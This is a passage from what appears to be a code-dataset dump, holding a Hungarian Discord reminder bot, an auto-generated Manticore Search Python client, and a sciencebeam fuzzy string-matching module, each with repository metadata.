szöveg = adat[id]["szöveg"]
holnap = datetime.date.today() + datetime.timedelta(days=1)
holnap = str(holnap.__format__("%Y.%m.%d."))
if esedékes == holnap:
csati = client.get_channel(695570356152303637)
rögzítő = client.get_user(int(adat[id]["rögzítette"]))
await csati.send(f"**{rögzítő.name}** által rögzített feladat **holnap** esedékes!\n:arrow_forward: {szöveg}")
adat["cache"].append(id)
with open("adat.json", "w") as f2:
json.dump(adat, f2)
async def feladatell2():
for id in adat:
if not (id == "cache" or id == "cache2"):
if not id in adat["cache2"]:
esedékes = adat[id]["esedekes"]
szöveg = adat[id]["szöveg"]
holnap = datetime.date.today()
holnap = str(holnap.__format__("%Y.%m.%d."))
if esedékes == holnap:
csati = client.get_channel(695570356152303637)
rögzítő = client.get_user(int(adat[id]["rögzítette"]))
await csati.send(f"**{rögzítő.name}** által rögzített feladat **ma** esedékes!\n:arrow_forward: {szöveg}")
adat["cache2"].append(id)
with open("adat.json", "w") as f2:
json.dump(adat, f2)
@client.command()
async def feladatok(ctx):
if ctx.author.bot:
return
embed = discord.Embed(title="Feladatok", color=0x00ff00, timestamp=datetime.datetime.utcnow())
for id in adat:
if not (id == "cache" or id == "cache2"):
ma = datetime.datetime.today().__format__("%Y.%m.%d.")
ma = datetime.datetime.strptime(ma, "%Y.%m.%d.")
esedekes = adat[id]["esedekes"]
szöveg = adat[id]["szöveg"]
dátum = datetime.datetime.strptime(adat[id]["esedekes"], "%Y.%m.%d.")
if not dátum < ma:
rögzítő = client.get_user(int(adat[id]["rögzítette"]))
embed.add_field(name="Feladat", value=f"**Rögzítette:** {rögzítő.name}\n**Határidő:** {esedekes}\n**Szöveg:** {szöveg}")
if len(embed.fields) > 0:
await ctx.send(embed=embed)
else:
await ctx.send(":tada: Jelenleg nincs egy határidős feladat sem.")
client.run("TOKEN")
| 3,999 | 0 | 134 |
2f7166295fc0fb168bd8d66ddd176c29ddcd09f4 | 16,491 | py | Python | out/manticoresearch-python/manticoresearch/api/search_api.py | mihaj/openapi | 29e878b0be1218a897c4c86bf9d8d51f4d1a3e57 | [
"MIT"
] | null | null | null | out/manticoresearch-python/manticoresearch/api/search_api.py | mihaj/openapi | 29e878b0be1218a897c4c86bf9d8d51f4d1a3e57 | [
"MIT"
] | 3 | 2021-12-21T08:18:48.000Z | 2022-03-24T10:50:37.000Z | out/manticoresearch-python/manticoresearch/api/search_api.py | mihaj/openapi | 29e878b0be1218a897c4c86bf9d8d51f4d1a3e57 | [
"MIT"
] | 5 | 2021-12-11T06:10:14.000Z | 2022-03-18T11:05:24.000Z | # coding: utf-8
# Manticore Search Client
# Copyright (c) 2020-2021, Manticore Software LTD (https://manticoresearch.com)
#
# All rights reserved
#
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from six.moves.urllib.parse import quote
from manticoresearch.api_client import ApiClient
from manticoresearch.exceptions import ( # noqa: F401
ApiTypeError,
ApiValueError
)
class SearchApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def percolate(self, index, percolate_request, **kwargs): # noqa: E501
"""Perform reverse search on a percolate index # noqa: E501
Performs a percolate search. This method must be used only on percolate indexes. Expects two parameters: the index name and an object with array of documents to be tested. An example of the documents object: ``` {\"query\":{\"percolate\":{\"document\":{\"content\":\"sample content\"}}}} ``` Responds with an object with matched stored queries: ``` {'timed_out':false,'hits':{'total':2,'max_score':1,'hits':[{'_index':'idx_pq_1','_type':'doc','_id':'2','_score':'1','_source':{'query':{'match':{'title':'some'},}}},{'_index':'idx_pq_1','_type':'doc','_id':'5','_score':'1','_source':{'query':{'ql':'some | none'}}}]}} ``` # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.percolate(index, percolate_request, async_req=True)
>>> result = thread.get()
:param index: Name of the percolate index (required)
:type index: str
:param percolate_request: (required)
:type percolate_request: PercolateRequest
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: SearchResponse
"""
kwargs['_return_http_data_only'] = True
return self.percolate_with_http_info(index, percolate_request, **kwargs) # noqa: E501
def percolate_with_http_info(self, index, percolate_request, **kwargs): # noqa: E501
"""Perform reverse search on a percolate index # noqa: E501
Performs a percolate search. This method must be used only on percolate indexes. Expects two parameters: the index name and an object with array of documents to be tested. An example of the documents object: ``` {\"query\":{\"percolate\":{\"document\":{\"content\":\"sample content\"}}}} ``` Responds with an object with matched stored queries: ``` {'timed_out':false,'hits':{'total':2,'max_score':1,'hits':[{'_index':'idx_pq_1','_type':'doc','_id':'2','_score':'1','_source':{'query':{'match':{'title':'some'},}}},{'_index':'idx_pq_1','_type':'doc','_id':'5','_score':'1','_source':{'query':{'ql':'some | none'}}}]}} ``` # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.percolate_with_http_info(index, percolate_request, async_req=True)
>>> result = thread.get()
:param index: Name of the percolate index (required)
:type index: str
:param percolate_request: (required)
:type percolate_request: PercolateRequest
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(SearchResponse, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'index',
'percolate_request'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method percolate" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'index' is set
if self.api_client.client_side_validation and ('index' not in local_var_params or # noqa: E501
local_var_params['index'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `index` when calling `percolate`") # noqa: E501
# verify the required parameter 'percolate_request' is set
if self.api_client.client_side_validation and ('percolate_request' not in local_var_params or # noqa: E501
local_var_params['percolate_request'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `percolate_request` when calling `percolate`") # noqa: E501
collection_formats = {}
path_params = {}
if 'index' in local_var_params:
path_params['index'] = local_var_params['index'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'percolate_request' in local_var_params:
body_params = local_var_params['percolate_request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
res = self.api_client.call_api(
'/json/pq/{index}/search', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SearchResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
return res
def search(self, search_request, **kwargs): # noqa: E501
"""Performs a search # noqa: E501
Expects an object with mandatory properties: * the index name * the match query object Example : ``` {'index':'movies','query':{'bool':{'must':[{'query_string':' movie'}]}},'script_fields':{'myexpr':{'script':{'inline':'IF(rating>8,1,0)'}}},'sort':[{'myexpr':'desc'},{'_score':'desc'}],'profile':true} ``` It responds with an object with: - time of execution - if the query timed out - an array with hits (matched documents) - additional, if profiling is enabled, an array with profiling information is attached ``` {'took':10,'timed_out':false,'hits':{'total':2,'hits':[{'_id':'1','_score':1,'_source':{'gid':11}},{'_id':'2','_score':1,'_source':{'gid':12}}]}} ``` For more information about the match query syntax, additional paramaters that can be set to the input and response, please check: https://manual.manticoresearch.com/Searching/Full_text_matching/Basic_usage#HTTP. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.search(search_request, async_req=True)
>>> result = thread.get()
:param search_request: (required)
:type search_request: SearchRequest
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: SearchResponse
"""
kwargs['_return_http_data_only'] = True
return self.search_with_http_info(search_request, **kwargs) # noqa: E501
def search_with_http_info(self, search_request, **kwargs): # noqa: E501
"""Performs a search # noqa: E501
Expects an object with mandatory properties: * the index name * the match query object Example : ``` {'index':'movies','query':{'bool':{'must':[{'query_string':' movie'}]}},'script_fields':{'myexpr':{'script':{'inline':'IF(rating>8,1,0)'}}},'sort':[{'myexpr':'desc'},{'_score':'desc'}],'profile':true} ``` It responds with an object with: - time of execution - if the query timed out - an array with hits (matched documents) - additional, if profiling is enabled, an array with profiling information is attached ``` {'took':10,'timed_out':false,'hits':{'total':2,'hits':[{'_id':'1','_score':1,'_source':{'gid':11}},{'_id':'2','_score':1,'_source':{'gid':12}}]}} ``` For more information about the match query syntax, additional paramaters that can be set to the input and response, please check: https://manual.manticoresearch.com/Searching/Full_text_matching/Basic_usage#HTTP. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.search_with_http_info(search_request, async_req=True)
>>> result = thread.get()
:param search_request: (required)
:type search_request: SearchRequest
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(SearchResponse, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'search_request'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method search" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'search_request' is set
if self.api_client.client_side_validation and ('search_request' not in local_var_params or # noqa: E501
local_var_params['search_request'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `search_request` when calling `search`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'search_request' in local_var_params:
body_params = local_var_params['search_request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
res = self.api_client.call_api(
'/json/search', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SearchResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
return res
| 51.214286 | 918 | 0.608271 | # coding: utf-8
# Manticore Search Client
# Copyright (c) 2020-2021, Manticore Software LTD (https://manticoresearch.com)
#
# All rights reserved
#
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from six.moves.urllib.parse import quote
from manticoresearch.api_client import ApiClient
from manticoresearch.exceptions import ( # noqa: F401
ApiTypeError,
ApiValueError
)
class SearchApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def percolate(self, index, percolate_request, **kwargs): # noqa: E501
"""Perform reverse search on a percolate index # noqa: E501
Performs a percolate search. This method must be used only on percolate indexes. Expects two parameters: the index name and an object with array of documents to be tested. An example of the documents object: ``` {\"query\":{\"percolate\":{\"document\":{\"content\":\"sample content\"}}}} ``` Responds with an object with matched stored queries: ``` {'timed_out':false,'hits':{'total':2,'max_score':1,'hits':[{'_index':'idx_pq_1','_type':'doc','_id':'2','_score':'1','_source':{'query':{'match':{'title':'some'},}}},{'_index':'idx_pq_1','_type':'doc','_id':'5','_score':'1','_source':{'query':{'ql':'some | none'}}}]}} ``` # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.percolate(index, percolate_request, async_req=True)
>>> result = thread.get()
:param index: Name of the percolate index (required)
:type index: str
:param percolate_request: (required)
:type percolate_request: PercolateRequest
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: SearchResponse
"""
kwargs['_return_http_data_only'] = True
return self.percolate_with_http_info(index, percolate_request, **kwargs) # noqa: E501
def percolate_with_http_info(self, index, percolate_request, **kwargs): # noqa: E501
"""Perform reverse search on a percolate index # noqa: E501
Performs a percolate search. This method must be used only on percolate indexes. Expects two parameters: the index name and an object with array of documents to be tested. An example of the documents object: ``` {\"query\":{\"percolate\":{\"document\":{\"content\":\"sample content\"}}}} ``` Responds with an object with matched stored queries: ``` {'timed_out':false,'hits':{'total':2,'max_score':1,'hits':[{'_index':'idx_pq_1','_type':'doc','_id':'2','_score':'1','_source':{'query':{'match':{'title':'some'},}}},{'_index':'idx_pq_1','_type':'doc','_id':'5','_score':'1','_source':{'query':{'ql':'some | none'}}}]}} ``` # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.percolate_with_http_info(index, percolate_request, async_req=True)
>>> result = thread.get()
:param index: Name of the percolate index (required)
:type index: str
:param percolate_request: (required)
:type percolate_request: PercolateRequest
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(SearchResponse, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'index',
'percolate_request'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method percolate" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'index' is set
if self.api_client.client_side_validation and ('index' not in local_var_params or # noqa: E501
local_var_params['index'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `index` when calling `percolate`") # noqa: E501
# verify the required parameter 'percolate_request' is set
if self.api_client.client_side_validation and ('percolate_request' not in local_var_params or # noqa: E501
local_var_params['percolate_request'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `percolate_request` when calling `percolate`") # noqa: E501
collection_formats = {}
path_params = {}
if 'index' in local_var_params:
path_params['index'] = local_var_params['index'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'percolate_request' in local_var_params:
body_params = local_var_params['percolate_request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
res = self.api_client.call_api(
'/json/pq/{index}/search', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SearchResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
return res
def search(self, search_request, **kwargs): # noqa: E501
"""Performs a search # noqa: E501
Expects an object with mandatory properties: * the index name * the match query object Example : ``` {'index':'movies','query':{'bool':{'must':[{'query_string':' movie'}]}},'script_fields':{'myexpr':{'script':{'inline':'IF(rating>8,1,0)'}}},'sort':[{'myexpr':'desc'},{'_score':'desc'}],'profile':true} ``` It responds with an object with: - time of execution - if the query timed out - an array with hits (matched documents) - additional, if profiling is enabled, an array with profiling information is attached ``` {'took':10,'timed_out':false,'hits':{'total':2,'hits':[{'_id':'1','_score':1,'_source':{'gid':11}},{'_id':'2','_score':1,'_source':{'gid':12}}]}} ``` For more information about the match query syntax, additional paramaters that can be set to the input and response, please check: https://manual.manticoresearch.com/Searching/Full_text_matching/Basic_usage#HTTP. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.search(search_request, async_req=True)
>>> result = thread.get()
:param search_request: (required)
:type search_request: SearchRequest
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: SearchResponse
"""
kwargs['_return_http_data_only'] = True
return self.search_with_http_info(search_request, **kwargs) # noqa: E501
def search_with_http_info(self, search_request, **kwargs): # noqa: E501
"""Performs a search # noqa: E501
Expects an object with mandatory properties: * the index name * the match query object Example : ``` {'index':'movies','query':{'bool':{'must':[{'query_string':' movie'}]}},'script_fields':{'myexpr':{'script':{'inline':'IF(rating>8,1,0)'}}},'sort':[{'myexpr':'desc'},{'_score':'desc'}],'profile':true} ``` It responds with an object with: - time of execution - if the query timed out - an array with hits (matched documents) - additional, if profiling is enabled, an array with profiling information is attached ``` {'took':10,'timed_out':false,'hits':{'total':2,'hits':[{'_id':'1','_score':1,'_source':{'gid':11}},{'_id':'2','_score':1,'_source':{'gid':12}}]}} ``` For more information about the match query syntax, additional paramaters that can be set to the input and response, please check: https://manual.manticoresearch.com/Searching/Full_text_matching/Basic_usage#HTTP. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.search_with_http_info(search_request, async_req=True)
>>> result = thread.get()
:param search_request: (required)
:type search_request: SearchRequest
:param async_req: Whether to execute the request asynchronously.
:type async_req: bool, optional
:param _return_http_data_only: response data without head status code
and headers
:type _return_http_data_only: bool, optional
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:type _preload_content: bool, optional
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:param _request_auth: set to override the auth_settings for an a single
request; this effectively ignores the authentication
in the spec for a single request.
:type _request_auth: dict, optional
:return: Returns the result object.
If the method is called asynchronously,
returns the request thread.
:rtype: tuple(SearchResponse, status_code(int), headers(HTTPHeaderDict))
"""
local_var_params = locals()
all_params = [
'search_request'
]
all_params.extend(
[
'async_req',
'_return_http_data_only',
'_preload_content',
'_request_timeout',
'_request_auth'
]
)
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method search" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'search_request' is set
if self.api_client.client_side_validation and ('search_request' not in local_var_params or # noqa: E501
local_var_params['search_request'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `search_request` when calling `search`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'search_request' in local_var_params:
body_params = local_var_params['search_request']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
res = self.api_client.call_api(
'/json/search', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SearchResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats,
_request_auth=local_var_params.get('_request_auth'))
return res
| 120 | 0 | 27 |
d5892abdd9874781d3c8a04d059d2d242933ccc9 | 8,217 | py | Python | sciencebeam_judge/utils/fuzzy.py | elifesciences/sciencebeam-judge | 357f1b4266674611b24371224468db268ed4574e | [
"MIT"
] | null | null | null | sciencebeam_judge/utils/fuzzy.py | elifesciences/sciencebeam-judge | 357f1b4266674611b24371224468db268ed4574e | [
"MIT"
] | 189 | 2018-01-11T17:14:18.000Z | 2022-03-28T17:30:11.000Z | sciencebeam_judge/utils/fuzzy.py | elifesciences/sciencebeam-judge | 357f1b4266674611b24371224468db268ed4574e | [
"MIT"
] | null | null | null | import logging
from typing import AnyStr, Callable, Iterable, List, Optional, Tuple
LOGGER = logging.getLogger(__name__)
T_IsJunkFunction = Callable[[AnyStr, int], bool]
EMPTY_MATCHING_BLOCKS = MatchingBlocks([])
| 29.451613 | 95 | 0.62103 | import logging
from typing import AnyStr, Callable, Iterable, List, Optional, Tuple
LOGGER = logging.getLogger(__name__)
T_IsJunkFunction = Callable[[AnyStr, int], bool]
class StringView:
def __init__(self, original_string: str, in_view: List[bool]):
self.original_string = original_string
self.in_view = in_view
self.string_view = ''.join((
ch
for ch, is_included in zip(original_string, in_view)
if is_included
))
self.original_index_at = [
index
for index, is_included in enumerate(in_view)
if is_included
]
self._view_index_at: Optional[List[int]] = None
@staticmethod
def from_view_map(original_string: str, in_view: List[bool]) -> 'StringView':
return StringView(original_string, in_view)
@property
def view_index_at(self) -> List[int]:
if self._view_index_at is not None:
return self._view_index_at
view_index_at = []
index = 0
for is_included in self.in_view:
view_index_at.append(index)
if is_included:
index += 1
self._view_index_at = view_index_at
return view_index_at
def __len__(self):
return len(self.string_view)
def __str__(self):
return self.string_view
def __repr__(self):
return '%s(original=%r, in_view=%s, view=%r)' % (
type(self).__name__, self.original_string, self.in_view, self.string_view
)
class IndexRange(Tuple[int, int]):
@property
def size(self):
return self[1] - self[0]
class MatchingBlocks(Tuple[Tuple[int, int, int], ...]):
def with_offset(self, a_offset: int, b_offset: int) -> 'MatchingBlocks':
if not a_offset and not b_offset:
return self
return MatchingBlocks(tuple(
(ai + a_offset, bi + b_offset, size)
for ai, bi, size in self
))
@property
def non_empty(self) -> 'MatchingBlocks':
return MatchingBlocks(tuple(
(ai, bi, size)
for ai, bi, size in self
if size
))
@property
def first_block(self) -> Optional[Tuple[int, int, int]]:
if not self:
return None
first_block = self[0]
first_block_size = first_block[2]
if first_block_size:
return first_block
return None
@property
def last_block(self) -> Optional[Tuple[int, int, int]]:
index = len(self) - 1
while index >= 0:
last_block = self[index]
last_block_size = last_block[2]
if last_block_size:
return last_block
index -= 1
return None
def get_start_offset(self, seq_index: int):
first_block = self.first_block
if not first_block:
return None
return first_block[seq_index]
@property
def start_a(self):
return self.get_start_offset(0)
@property
def start_b(self):
return self.get_start_offset(1)
def get_end_offset(self, seq_index: int) -> int:
last_block = self.last_block
if not last_block:
return 0
last_block_size = last_block[2]
return last_block[seq_index] + last_block_size
@property
def end_a(self):
return self.get_end_offset(0)
@property
def end_b(self):
return self.get_end_offset(1)
@property
def start_end_a(self) -> IndexRange:
return IndexRange((self.start_a, self.end_a,))
@property
def start_end_b(self) -> IndexRange:
return IndexRange((self.start_b, self.end_b,))
@property
def match_count(self) -> int:
return sum(size for _, _, size in self)
EMPTY_MATCHING_BLOCKS = MatchingBlocks([])
class MatchingBlocksWithMatchedText:
def __init__(self, matching_blocks: Tuple[Tuple[int, int, int], ...], text: str):
self.matching_blocks = matching_blocks
self.text = text
def __iter__(self) -> Iterable[Tuple[int, int, int, str]]:
return (
(a_index, b_index, size, self.text[a_index:a_index + size])
for a_index, b_index, size in self.matching_blocks
)
def __repr__(self):
return str(tuple(self))
def iter_translate_string_view_matching_block(
a_index: int,
b_index: int,
size: int,
a_string_view: StringView,
b_string_view: StringView
) -> Iterable[Tuple[int, int, int]]:
if not size:
return
remaining_view_size = size
view_block_size = remaining_view_size
while view_block_size:
a_original_index = a_string_view.original_index_at[a_index]
b_original_index = b_string_view.original_index_at[b_index]
a_original_size = (
a_string_view.original_index_at[a_index + view_block_size - 1]
- a_original_index
+ 1
)
b_original_size = (
b_string_view.original_index_at[b_index + view_block_size - 1]
- b_original_index
+ 1
)
if a_original_size != b_original_size:
LOGGER.debug('a_size: %d, b_size: %d', a_original_size, b_original_size)
view_block_size -= 1
continue
yield a_original_index, b_original_index, a_original_size
a_index += view_block_size
b_index += view_block_size
remaining_view_size -= view_block_size
view_block_size = remaining_view_size
def translate_string_view_matching_blocks(
matching_blocks: MatchingBlocks,
a_string_view: StringView,
b_string_view: StringView
) -> MatchingBlocks:
return MatchingBlocks([
(a_view_index, b_view_index, view_size)
for ai, bi, size in matching_blocks
for a_view_index, b_view_index, view_size in iter_translate_string_view_matching_block(
ai, bi, size, a_string_view=a_string_view, b_string_view=b_string_view
)
])
def space_is_junk(text: str, index: int) -> bool:
return text[index].isspace()
class FuzzyMatchResult:
def __init__(
self,
a: str,
b: str,
matching_blocks: MatchingBlocks,
is_junk_fn: Optional[T_IsJunkFunction] = None
):
self.a = a
self.b = b
self.matching_blocks = matching_blocks
self.non_empty_matching_blocks = matching_blocks.non_empty
self.is_junk_fn = is_junk_fn
def __repr__(self):
return (
'{}(matching_blocks={}, match_count={}, a_length={}, b_length={})'.format(
type(self).__name__,
self.matching_blocks,
self.matching_blocks.match_count,
len(self.a),
len(self.b)
)
)
def ratio_to(self, size: int) -> float:
if not size:
return 0.0
return self.matching_blocks.match_count / size
def get_first_chunk_matching_blocks(
haystack: str,
needle: str,
matching_blocks: MatchingBlocks,
threshold: float,
is_junk_fn: T_IsJunkFunction,
match_score_fn: Callable[[FuzzyMatchResult], float]
) -> MatchingBlocks:
matching_blocks = matching_blocks.non_empty
block_count = len(matching_blocks)
while block_count:
chunk_matching_blocks = MatchingBlocks(matching_blocks[:block_count])
chunk_needle_start = chunk_matching_blocks.start_b
chunk_needle_end = chunk_matching_blocks.end_b
LOGGER.debug(
'chunk_needle_start: %s, chunk_needle_end: %s',
chunk_needle_start, chunk_needle_end
)
if chunk_needle_end <= chunk_needle_start:
break
chunk_needle = needle[chunk_needle_start:chunk_needle_end]
fm = FuzzyMatchResult(
haystack,
chunk_needle,
chunk_matching_blocks,
is_junk_fn=is_junk_fn
)
ratio = match_score_fn(fm)
LOGGER.debug('temp fm: %s (ratio: %s)', fm, ratio)
if ratio >= threshold:
LOGGER.debug('chunk_needle: %s', chunk_needle)
return chunk_matching_blocks
block_count -= 1
return EMPTY_MATCHING_BLOCKS
| 6,838 | 783 | 367 |
fc950b593505a95c7eb4c6d9b319b9c560f20f10 | 3,763 | py | Python | lib_pypy/_cffi_ssl/_cffi_src/utils.py | yxzoro/pypy | 6e47b3d3e5513d9639a21554963a6ace172ccfee | [
"Apache-2.0",
"OpenSSL"
] | 10 | 2018-12-18T18:04:28.000Z | 2021-04-23T07:31:13.000Z | lib_pypy/_cffi_ssl/_cffi_src/utils.py | yxzoro/pypy | 6e47b3d3e5513d9639a21554963a6ace172ccfee | [
"Apache-2.0",
"OpenSSL"
] | null | null | null | lib_pypy/_cffi_ssl/_cffi_src/utils.py | yxzoro/pypy | 6e47b3d3e5513d9639a21554963a6ace172ccfee | [
"Apache-2.0",
"OpenSSL"
